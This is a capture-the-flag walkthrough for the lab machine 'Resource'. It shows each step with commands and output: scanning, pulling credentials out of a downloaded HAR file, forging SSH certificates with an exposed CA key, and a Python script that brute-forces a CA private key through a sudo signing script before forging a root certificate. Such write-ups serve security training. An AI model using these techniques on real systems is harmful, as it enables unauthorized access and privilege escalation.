Explore the fundamentals of cybersecurity in the Resource Capture The Flag (CTF) challenge, a hard-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
1
| 10.10.11.27 ssg.htb itrc.ssg.htb
|
Script to add hosts automatically
1
2
3
| ip="10.10.11.27"
domain="ssg.htb itrc.ssg.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
|
Mapping
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| Nmap scan report for itrc.ssg.htb (10.10.11.27)
Host is up (0.052s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_ 256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_ 256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
copy the coockie value PHPSESSID
1
2
3
4
| curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -b 'PHPSESSID=<value>' -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
grep -oP 'user=[^&]+&pass=[^"]+' itrc.ssg.htb.har
rm -rf c2f4813259cc57fab36b311c5058cf031cb6eb51.zip itrc.ssg.htb.har
|
1
| ssh msainristil@itrc.ssg.htb
|
CA Cert Autority
1
2
3
4
| cd decommission_old_ca/
ssh-keygen -t rsa -b 2048 -f keypair
ssh-keygen -s ca-itrc -I user-cert -n root -V +52w -z 12345 keypair.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair root@localhost
|
1
2
| cat /home/zzinter/user.txt
exit
|
Now for zzinter
1
2
3
| cd decommission_old_ca/
ssh-keygen -t rsa -C zzinter@ssg.htb -f users_key
ssh-keygen -s ca-itrc -n zzinter -I ident users_key.pub
|
in you local pc:
1
2
| scp msainristil@itrc.ssg.htb:'/home/msainristil/decommission_old_ca/user***' .
ssh -i users_key zzinter@ssg.htb
|
to move from zzinter@itrc to the docker host
1
2
3
4
5
6
7
| cp sign_key_api.sh sign.sh
chmod +x sign.sh
sed -i 's/supported_principals="webserver,analytics,support,security"/supported_principals="webserver,analytics,support,security,zzinter_temp"/' sign.sh
rm -f keypair*
ssh-keygen -f keypair
./sign.sh keypair.pub zzinter zzinter_temp | tee keypair-cert.pub
ssh -o CertificateFile=keypair-cert.pub -i keypair zzinter@172.223.0.1 -p 2222
|
172.223.0.1 was identified through a ping sweep and port scan.
Now for root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| #!/bin/env python
import subprocess
import string
def run_signing_command(pattern):
with open('/tmp/ca-test', 'w') as f:
f.write(pattern)
result = subprocess.run(['sudo', '/opt/sign_key.sh', '/tmp/ca-test', 'root.pub', 'root', 'root_user', 'ABCD'], capture_output=True, text=True)
return result.stdout.strip(), result.stderr.strip()
def brute_force_patterns():
chars = string.ascii_letters + string.digits + '-+=/ \r\n'
base_pattern = ''
while True:
found = False
for char in chars:
pattern = base_pattern + char + '*'
stdout, _ = run_signing_command(pattern)
if "Error: Use API for signing with this CA." in stdout:
base_pattern += char
print(base_pattern)
found = True
break
if not found:
break
return base_pattern
if __name__ == '__main__':
ca_key = brute_force_patterns()
if "-----END OPENSSH PRIVATE KEY-----" in ca_key:
with open("ca-it", "w") as file:
file.write(ca_key)
print("\n\nSuccess\n")
else:
exit("\n\nFail\n")
|
now in your local pc use the key:
1
2
3
4
5
| nano pwn.key
chmod 600 pwn.key
yes | ssh-keygen -f root
ssh-keygen -s pwn.key -z 200 -I root -V -10w:forever -n root_user root.pub
ssh root@itrc.ssg.htb -p 2222 -i root -i root-cert.pub
|